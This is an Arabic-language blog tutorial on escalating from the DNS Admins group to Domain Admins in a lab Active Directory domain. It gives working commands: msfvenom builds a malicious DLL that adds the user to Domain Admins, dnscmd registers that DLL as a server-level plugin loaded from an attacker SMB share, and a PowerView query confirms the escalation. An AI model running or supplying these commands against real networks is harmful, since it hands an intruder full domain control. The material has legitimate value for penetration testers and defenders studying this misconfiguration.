DNS Admins to Domain Admins

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

ماهو قروب الـDNS Admins ؟

اعضاء قروب DNS Admins يمتلكون صلاحيات لـ إضافة او التعديل على نطاقات الـActive Directory وايضا في امكانهم اضافة New Configuration عن طريق ملف DLL الى اي نطاق و هذا اللي يهمنا ف بالتالي راح ننشأ ملف DLL خبيث عن طريق msfvenom ونقوم بتنصيبه كـNew Configuration على الـDomain Controller ف عند اعادة تشغيل الـDNS Service او اعادة تشغيل الـDomain Controller سيتم تحميل الـDLL وتنفيذه (:



الشرح:

في الاول انا داخل بالمستخدم jehad وراح ننفذ هالأمر ونشوف هل المستخدم jehad ضمن قروب DNS Admins او لا:



 

زي ماتلاحظون في الصورة السابقة انه المستخدم jehad ضمن قروب DNS Admins الان كل اللي علينا ننشأ ملف DLL يضيفنا الى الـDomain Admins عن طريق msfvenom
 

msfvenom -p windows/x64/exec cmd='net group "domain admins" jehad /add /domain' -f dll > dns.dll

الان كل اللي علينا نفتح smb share عند طريق هذا الامر حتى اذا تم اعادة تشغيل الـDNS Service او تم اعادة تشغيل الـDomain Controller راح يحمل الـDLL وينفذها

 

الان راح ننفذ امر اضافة new configuration ونحدد مسار الـDLL الخاص في الـConfigure الموجود في الـ smb share  و الـDomain Controller ايضا (:

dnscmd.exe WIN-1PL5L23B93J.vulnerable.local /config /serverlevelplugindll \\192.168.100.114\jehad\dns.dll

الان لو يتم اعادة تشغيل الـDomain Controller او DNS Service راح يتحمل الـDLL ويضيفنا لقروب الـ Domain Admins (:
 

بعد اعادة تشغيل الـDomain Controller زي مانلاحظ في الصورة السابقة صار تحميل لملف الـDLL وتم تنفيذه (:

الان راح ننفذ هذا الامر عشان نشوف هل تم اضافة المستخدم jehad الى قروب الـDomain Admins او لا:

 

get-netgroupmember -identity "Domain Admins"

زي مانلاحظ في الصور السابقة تم اضافة المستخدم jehad الى قروب الـDomain Admins


وصلنا لنهاية المقالة

شاكر لكم 😊